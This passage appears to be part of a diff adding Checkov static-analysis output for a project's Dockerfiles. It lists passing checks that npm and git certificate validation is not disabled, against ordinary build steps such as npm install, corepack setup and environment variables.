"caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18, + "resource_type": "ENV", + "hash": "65abe3eb0aadfa3b1ed513b9e21f4f8c4524ec8c298e7123de46806870b90557" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 16, + 19 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=production\n", + "value": "NODE_ENV=production", + "__startline__": 28, + "__endline__": 28, + "resource_type": "ENV", + "hash": "5a6afcff0e4c111b04ace6d372feb2943096034796456739be650482e87f3e0e" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 29, + "ENV NODE_ENV=production\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 29, + 29 + ], + "resource": "/Dockerfile.production.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NODE_ENV=test\n", + "value": "NODE_ENV=test", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ENV", + "hash": "14d83a642c69d4cf67fcdbeb6dace7ba464024fdcad52f8129d63c78042457cb" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ENV NODE_ENV=test\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.test.ENV", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_12", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environment variable", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_API_URL\n", + "value": "NEXT_PUBLIC_API_URL", + "__startline__": 11, + "__endline__": 11, + "resource_type": "ARG", + "hash": "fded00a21c81cd45d8985324636a2acafc73bef594a45811ca0d68265da3f9dc" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 12, + 12 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_MARKETPLACE_URL\n", + "value": "NEXT_PUBLIC_MARKETPLACE_URL", + "__startline__": 12, + "__endline__": 12, + "resource_type": "ARG", + "hash": "11d98758a432fc03021573afe4df769dc34ff0a4aec966f558b5e00c71c6cf3b" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 13, + 13 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_DASHBOARD_URL\n", + "value": "NEXT_PUBLIC_DASHBOARD_URL", + "__startline__": 13, + "__endline__": 13, + "resource_type": "ARG", + "hash": "4075db881e0d222faeb86e03db8a05d9a998deab344c05aee0e89d2426e01383" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 14, + 14 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ARG", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14 + }, + "label_": "resource: ARG", + "id_": "ARG", + "source_": "Dockerfile", + "content": "ARG NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_ADMIN_URL", + "__startline__": 14, + "__endline__": 14, + "resource_type": "ARG", + "hash": "a4c9bf1c4e349946074fb4c606d0db63c06a809d125e58ddd09427e4d929fd6a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 15, + 15 + ], + "resource": "/Dockerfile.production.ARG", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_14", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "ENV", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18 + }, + "label_": "resource: ENV", + "id_": "ENV", + "source_": "Dockerfile", + "content": "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n", + "value": "NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL", + "__startline__": 15, + "__endline__": 18, + "resource_type": "ENV", + "hash": "65abe3eb0aadfa3b1ed513b9e21f4f8c4524ec8c298e7123de46806870b90557" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 